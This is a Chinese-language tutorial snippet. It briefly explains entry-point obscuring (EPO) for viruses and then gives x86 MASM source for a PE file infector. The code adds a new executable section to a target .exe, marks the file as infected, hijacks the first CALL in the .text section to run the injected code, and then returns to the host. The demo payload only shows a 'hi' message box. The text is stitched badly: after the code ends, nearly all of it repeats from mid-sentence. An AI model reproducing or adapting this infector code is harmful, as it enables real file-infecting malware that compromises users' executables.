EPO是EntryPoint Obscuring技术的简写,意即入口模糊技术,该技术改变了传统的修改PE
头部的入口点,使其指向病毒代码入口而使病毒代码得以执行的典型方法。
.386
.model flat, stdcall
option casemap:none
include useful.inc
PEGame SEGMENT
start:
@pushsz 'e:/test/m.exe'
call InfectFile
Invoke MessageBox,0,0,0,0 ;用来装载User32,后面用
ret
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
call CreateFile
cmp eax,INVALID_HANDLE_value
jz IF_Exit
mov hFile,eax
xor edi , edi ;节约空间
push edi
push edi
push edi
push PAGE_READWRITE
push edi
push hFile
call CreateFileMapping
or eax,eax
jz IF_F3
mov hMapping , eax
push edi ;edi=0
push edi
push edi
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call MapViewOfFile
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi:ptr IMAGE_DOS_HEADER
cmp [esi].e_magic,IMAGE_DOS_SIGNATURE
jnz IF_F1
cmp [esi].e_lfarlc,040h
jnz IF_F1
add esi,[esi].e_lfanew
assume esi:ptr IMAGE_NT_HEADERS
cmp [esi].Signature,IMAGE_NT_SIGNATURE ;是PE文件吗?
jnz IF_F1
cmp [esi].OptionalHeader.Subsystem,2
jnz IF_F1
cmp [esi].OptionalHeader.CheckSum,0 ;避免感染!0的文件
jnz IF_F1 ;合法性判断完毕,开始感染
cmp word ptr [esi+1ah],0815h ;设置感染标志
jz IF_F1
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
mov HostEntry,eax ;保存原入口
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx
add eax,sizeof IMAGE_NT_HEADERS
add eax,esi
mov edi,eax
add eax,sizeof IMAGE_SECTION_HEADER
sub eax,pMapping
cmp eax,[esi].OptionalHeader.SizeOfHeaders
ja IF_F1
;*****************************************
;空间允许, ^0^,edi指向新节
;*****************************************
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],'cvc.' ;Name
push VEnd-VStart
pop [edi].Misc.VirtualSize ;VirtualSize
push [esi].OptionalHeader.SizeOfImage
pop [edi].VirtualAddress ;VirtualAddress
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax ;SizeOfRawData
lea eax,[edi-28h+14h] ;prev PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;prev SizeOfRawData
add eax,[ecx]
mov [edi].PointerToRawData,eax ;PointerToRawData
mov [edi].Characteristics,0E0000020h ;可读可写可执行
;***************************************************************
;更新SizeOfImage,使新节可以正确加载并首先执行
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov word ptr [esi+1ah],0815h ;写入感染标志
push pMapping ;文件内存映像首地址
push esi ;esi -> IMAGE_NT_HEADER
push edi ; edi -> new Section
call SimpleEPO
@pushsz 'User32.dll'
call GetModuleHandle
@pushsz 'MessageBoxA'
push eax
call GetProcAddress
mov MsgBox,eax ;得到MessageBoxA的线形地址
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call SetFilePointer
;****************************************************************
;设置文件指针到结尾后,写入从VStart开始的代码,大小经过文件对齐
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push [edi].SizeOfRawData
push offset VStart
push hFile
call WriteFile
IF_F1:
push pMapping
call UnmapViewOfFile
IF_F2:
push hMapping
call CloseHandle
IF_F3:
push hFile
call CloseHandle
IF_Exit:
popad
ret 4
InfectFile ENDP
;---------------------------------StartEPO------------------------------
;入口参数: pNewSection : 新添加节(病毒节)的指针
; pNTHeader : 文件IMAGE_NT_HEADER的指针
; pMapping : 文件指针
;出口参数: 修改了文件.text节的第一条CALL XXXXXXXX 指令,跳转到VStart.
;拷贝JMP DWORD PTR [YYYYYYYY]中的YY…到Ret2ApiCall.
;--------------------------------------------------------------------------
SimpleEPO PROC pNewSection : DWORD ,pNTHeader : DWORD , pMapping : DWORD
pushad
mov edx , pNTHeader
add edx , sizeof IMAGE_NT_HEADERS
assume edx : ptr IMAGE_SECTION_HEADER
mov ecx , [edx].SizeOfRawData
mov edi , [edx].PointerToRawData
add edi , pMapping ;Now edi = .text 的在文件中的偏移
@SearchE8:
mov al , 0e8h
repne scasb ;search for call xxxxxxxx
mov esi , edi ;edi - > xxxxxxxx 而不是 e8 xx xx xx xx.
lodsd ;search call relative
add esi , eax ;esi - > JMP DWORD PTR [YYYYYYYY]
lodsw
cmp ax , 025ffh ;esi - > YYYYYYYY
jnz @SearchE8
PatchCALLandCopyJMP:
mov eax , [edx].VirtualAddress ;.text VirtualAddress
add eax , edi
sub eax , pMapping
sub eax , [edx].PointerToRawData ;eax contains VA of CALL XXXXXXXX
add eax , 4 ;sizeof(CALL xxxxxxxx) – sizeof(0E8h)
mov edx , pNewSection
mov edx , [edx].VirtualAddress
xchg eax , edx
sub eax , edx ;get new XXXXXXXX
stosd
mov edi , offset Ret2ApiCall ;write YYYYYYYY
lodsd
stosd
popad
ret 12
SimpleEPO ENDP
;***************************************************************
;从VStart->VEnd是将插入到e:/test/m.exe的代码
;功能是弹出一个对话框,然后返回原入口执行
;***************************************************************
VStart:
pushad
call gdelta
gdelta:
pop ebp
sub ebp,offset gdelta
lea eax, [ebp+offset s]
push 0
push eax
push eax
push 0
mov eax,12345678h
MsgBox = dword ptr $-4
call eax
popad
db 0FFh,25h
Ret2ApiCAll:
dd 0 ; [zzzzzzzz]
s db 'hi',0
VEnd:
EPOGame ends
end start
头部的入口点,使其指向病毒代码入口而使病毒代码得以执行的典型方法。
.386
.model flat, stdcall
option casemap:none
include useful.inc
PEGame SEGMENT
start:
@pushsz 'e:/test/m.exe'
call InfectFile
Invoke MessageBox,0,0,0,0 ;用来装载User32,后面用
ret
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
call CreateFile
cmp eax,INVALID_HANDLE_value
jz IF_Exit
mov hFile,eax
xor edi , edi ;节约空间
push edi
push edi
push edi
push PAGE_READWRITE
push edi
push hFile
call CreateFileMapping
or eax,eax
jz IF_F3
mov hMapping , eax
push edi ;edi=0
push edi
push edi
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call MapViewOfFile
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi:ptr IMAGE_DOS_HEADER
cmp [esi].e_magic,IMAGE_DOS_SIGNATURE
jnz IF_F1
cmp [esi].e_lfarlc,040h
jnz IF_F1
add esi,[esi].e_lfanew
assume esi:ptr IMAGE_NT_HEADERS
cmp [esi].Signature,IMAGE_NT_SIGNATURE ;是PE文件吗?
jnz IF_F1
cmp [esi].OptionalHeader.Subsystem,2
jnz IF_F1
cmp [esi].OptionalHeader.CheckSum,0 ;避免感染!0的文件
jnz IF_F1 ;合法性判断完毕,开始感染
cmp word ptr [esi+1ah],0815h ;设置感染标志
jz IF_F1
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
mov HostEntry,eax ;保存原入口
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx
add eax,sizeof IMAGE_NT_HEADERS
add eax,esi
mov edi,eax
add eax,sizeof IMAGE_SECTION_HEADER
sub eax,pMapping
cmp eax,[esi].OptionalHeader.SizeOfHeaders
ja IF_F1
;*****************************************
;空间允许, ^0^,edi指向新节
;*****************************************
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],'cvc.' ;Name
push VEnd-VStart
pop [edi].Misc.VirtualSize ;VirtualSize
push [esi].OptionalHeader.SizeOfImage
pop [edi].VirtualAddress ;VirtualAddress
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax ;SizeOfRawData
lea eax,[edi-28h+14h] ;prev PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;prev SizeOfRawData
add eax,[ecx]
mov [edi].PointerToRawData,eax ;PointerToRawData
mov [edi].Characteristics,0E0000020h ;可读可写可执行
;***************************************************************
;更新SizeOfImage,使新节可以正确加载并首先执行
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov word ptr [esi+1ah],0815h ;写入感染标志
push pMapping ;文件内存映像首地址
push esi ;esi -> IMAGE_NT_HEADER
push edi ; edi -> new Section
call SimpleEPO
@pushsz 'User32.dll'
call GetModuleHandle
@pushsz 'MessageBoxA'
push eax
call GetProcAddress
mov MsgBox,eax ;得到MessageBoxA的线形地址
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call SetFilePointer
;****************************************************************
;设置文件指针到结尾后,写入从VStart开始的代码,大小经过文件对齐
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push [edi].SizeOfRawData
push offset VStart
push hFile
call WriteFile
IF_F1:
push pMapping
call UnmapViewOfFile
IF_F2:
push hMapping
call CloseHandle
IF_F3:
push hFile
call CloseHandle
IF_Exit:
popad
ret 4
InfectFile ENDP
;---------------------------------StartEPO------------------------------
;入口参数: pNewSection : 新添加节(病毒节)的指针
; pNTHeader : 文件IMAGE_NT_HEADER的指针
; pMapping : 文件指针
;出口参数: 修改了文件.text节的第一条CALL XXXXXXXX 指令,跳转到VStart.
;拷贝JMP DWORD PTR [YYYYYYYY]中的YY…到Ret2ApiCall.
;--------------------------------------------------------------------------
SimpleEPO PROC pNewSection : DWORD ,pNTHeader : DWORD , pMapping : DWORD
pushad
mov edx , pNTHeader
add edx , sizeof IMAGE_NT_HEADERS
assume edx : ptr IMAGE_SECTION_HEADER
mov ecx , [edx].SizeOfRawData
mov edi , [edx].PointerToRawData
add edi , pMapping ;Now edi = .text 的在文件中的偏移
@SearchE8:
mov al , 0e8h
repne scasb ;search for call xxxxxxxx
mov esi , edi ;edi - > xxxxxxxx 而不是 e8 xx xx xx xx.
lodsd ;search call relative
add esi , eax ;esi - > JMP DWORD PTR [YYYYYYYY]
lodsw
cmp ax , 025ffh ;esi - > YYYYYYYY
jnz @SearchE8
PatchCALLandCopyJMP:
mov eax , [edx].VirtualAddress ;.text VirtualAddress
add eax , edi
sub eax , pMapping
sub eax , [edx].PointerToRawData ;eax contains VA of CALL XXXXXXXX
add eax , 4 ;sizeof(CALL xxxxxxxx) – sizeof(0E8h)
mov edx , pNewSection
mov edx , [edx].VirtualAddress
xchg eax , edx
sub eax , edx ;get new XXXXXXXX
stosd
mov edi , offset Ret2ApiCall ;write YYYYYYYY
lodsd
stosd
popad
ret 12
SimpleEPO ENDP
;***************************************************************
;从VStart->VEnd是将插入到e:/test/m.exe的代码
;功能是弹出一个对话框,然后返回原入口执行
;***************************************************************
VStart:
pushad
call gdelta
gdelta:
pop ebp
sub ebp,offset gdelta
lea eax, [ebp+offset s]
push 0
push eax
push eax
push 0
mov eax,12345678h
MsgBox = dword ptr $-4
call eax
popad
db 0FFh,25h
Ret2ApiCAll:
dd 0 ; [zzzzzzzz]
s db 'hi',0
VEnd:
EPOGame ends
end start